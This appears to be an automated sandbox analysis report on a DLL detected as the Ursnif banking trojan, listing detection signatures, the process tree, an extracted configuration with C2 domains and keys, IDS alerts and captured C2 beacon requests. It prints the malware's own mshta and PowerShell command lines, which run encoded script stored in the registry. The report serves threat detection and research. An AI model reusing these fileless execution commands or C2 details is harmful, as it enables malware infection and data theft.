Loading ...

Play interactive tourEdit tour

Windows Analysis Report 2770174.dll

Overview

General Information

Sample Name:2770174.dll
Analysis ID:444656
MD5:bce6371b0aed287193d8f90f2b1b4441
SHA1:2fc4f4c523c701dba03cf1f1e6971e61dc1efcb3
SHA256:4b631043c6ff0a2fd24591b0564f7b3fc59c46319646b27cec4cf24349227d36
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Hooks registry keys query functions (used to hide registry keys)
Machine Learning detection for sample
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5292 cmdline: loaddll32.exe 'C:\Users\user\Desktop\2770174.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 5336 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2770174.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5324 cmdline: rundll32.exe 'C:\Users\user\Desktop\2770174.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 5288 cmdline: regsvr32.exe /s C:\Users\user\Desktop\2770174.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 5300 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 2376 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5812 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 2904 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17432 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 476 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:82960 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 1844 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17442 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 2564 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17454 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 3020 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:82990 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 1240 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 2904 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83006 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4732 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:148488 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5144 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83022 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5804 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17508 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5684 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83042 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 1884 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17518 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4972 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17528 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 2812 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83060 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 5276 cmdline: rundll32.exe C:\Users\user\Desktop\2770174.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • mshta.exe (PID: 5332 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pyhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pyhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3076 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "1mPXe+HluarwW4R5yJj7kX696atmf6B7a6Jg5mZJ5i3sbRT19R7vT9mKoTtyIRImiHldxTU8DG3omytA0iEqz9hnZgVFnIpVKjKYSqpF7qVSkNASqDhbMdx0CqPxwgtnM3yHiXHYSYrxlGineE5/W0Lx89hsKcfonC8W/kvncnBH4KqUVMOPQeg/25xF11Xm", "c2_domain": ["outlook.com", "mail.com", "taybhctdyehfhgthp2.xyz", "thyihjtkylhmhnypp2.xyz"], "botnet": "5456", "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.452621123.0000000002508000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.340867138.0000000005278000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.358484652.0000000005168000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.452413152.0000000002508000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.476285292.0000000004F6C000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 34 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Encoded IEXShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pyhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pyhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5332, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 3076
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pyhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pyhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5332, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 3076
            Sigma detected: Mshta Spawning Windows ShellShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pyhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pyhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5332, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 3076
            Sigma detected: Non Interactive PowerShellShow sources
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pyhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pyhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5332, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 3076

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: 2770174.dllAvira: detected
            Found malware configurationShow sources
            Source: 0.2.loaddll32.exe.10000000.2.unpackMalware Configuration Extractor: Ursnif {"RSA Public Key": "1mPXe+HluarwW4R5yJj7kX696atmf6B7a6Jg5mZJ5i3sbRT19R7vT9mKoTtyIRImiHldxTU8DG3omytA0iEqz9hnZgVFnIpVKjKYSqpF7qVSkNASqDhbMdx0CqPxwgtnM3yHiXHYSYrxlGineE5/W0Lx89hsKcfonC8W/kvncnBH4KqUVMOPQeg/25xF11Xm", "c2_domain": ["outlook.com", "mail.com", "taybhctdyehfhgthp2.xyz", "thyihjtkylhmhnypp2.xyz"], "botnet": "5456", "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
            Machine Learning detection for sampleShow sources
            Source: 2770174.dllJoe Sandbox ML: detected
            Source: 0.2.loaddll32.exe.10000000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 3.2.rundll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: 2770174.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.5:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.5:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49768 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49789 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49790 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49783 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49782 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49796 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49798 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49799 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49800 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49802 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49826 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.5:49825 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49828 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.5:49827 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49832 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.5:49831 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49836 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.5:49835 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49838 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.5:49837 version: TLS 1.2

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49724 -> 40.97.116.82:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49803 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49803 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49805 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49805 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49814 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49814 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49815 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49815 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49817 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49819 -> 45.90.58.179:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49821 -> 45.90.58.179:80
            Performs DNS queries to domains with low reputationShow sources
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeDNS query: taybhctdyehfhgthp2.xyz
            Source: Joe Sandbox ViewIP Address: 40.97.148.226 40.97.148.226
            Source: Joe Sandbox ViewIP Address: 52.97.170.34 52.97.170.34
            Source: Joe Sandbox ViewASN Name: GREENFLOID-ASUA GREENFLOID-ASUA
            Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: global trafficHTTP traffic detected: GET /jdraw/yH91aKnpTrUgeTTXk_2FC/UNtUKwQdb1VcS_2B/GaoM_2Fyx_2BE1f/CKkjJtxjumUCxy08c3/hEyqk7y0R/Lv9aFeVgtQQx8QD9pW5d/Ac07adghbVZgEftTXAe/6L6pB6BmU2Y7k8ESiCzmDb/Z4dkw_2BAKquP/hA_2BwCK/3iTjiCeJZZSpLKXArjcyss9/OwKlQvPM9fHtt6/WpI0i7.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/GTAeWl1dTEKsPGzboniA9C/3TQSND4hN4q8j/tJxnEgfP/uW5VGwHzywLraum6aAQWdJy/1RqIzWDCCX/qrcTQot2XuPIeam7w/8XDXQ5cif7RJ/1_2B3PVmQx5/nHKK8uT65nNyIl/JeFpPVHIxWMVXvseH_2FD/YH70V7tTLImM6Joz/2I1VGAIxwkkbz7Z/4EmL4AYi/6QglyA.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mail.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jdraw/_2Faxv8_2Bu0S355431/zWBmIqRqQnvMB_2FKOk6CG/NwnPAjKDdicU7/LyyqKz0o/YfBYTeGYFQwkbZMyJ8naD46/LAJf_2B0RU/3xv7VkvLo_2BH32z2/0GV2mzuC7wB9/KQWi8z52zYq/laCh5k_2F_2FsN/gFzjneWKury1hVqDQnliR/azK5qDi4jLH99wYz/G9Hdx13SInuD3gF/73zT6HN_2B6msVs0lU/EuYlN_2BC7WR/i.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: PHPSESSID=t8ig2lm7e99tl9ioed8m825st0; lang=en
            Source: global trafficHTTP traffic detected: GET /jdraw/tR4LnoSVINT1f2c/0VvJfJtFJ0fvpQScRR/CPWVnO7Ig/8xymBr8_2BV2MPJj4WbJ/plMEUslrrtyCH_2Bwhq/1CDE4hgwgyY_2Bfw3s_2F1/UxPXHIDsYEwNA/DWJu4vAO/gkXIRDv7pcl_2FYyiYW0p52/VZjd1pdZUq/nUDfT2o7A87Q2yEgN/bEZSgdLSHpEB/Y8DoqjUm9asX_2BdG/q.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
            Source: global trafficHTTP traffic detected: GET /jdraw/6egkLxw_2B/0MDk_2F6Dttk_2BDL/PeMCvV_2FKSI/4qVuvEJzX6I/FapijqFJTF_2Fb/KhTAv5JxUk1yx17bklmA1/d0ce84VGmC4XToZ3/TiJp7oqlVeIG5y4/hFv5_2BNvMTr_2BeEi/G1O6zP7eh/h0jyonPucpxshjr38gHc/mUt_2Bbr2dZAiwNrJ6q/V3apeuqs4sJwa7IUzmg12g/qV5g.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
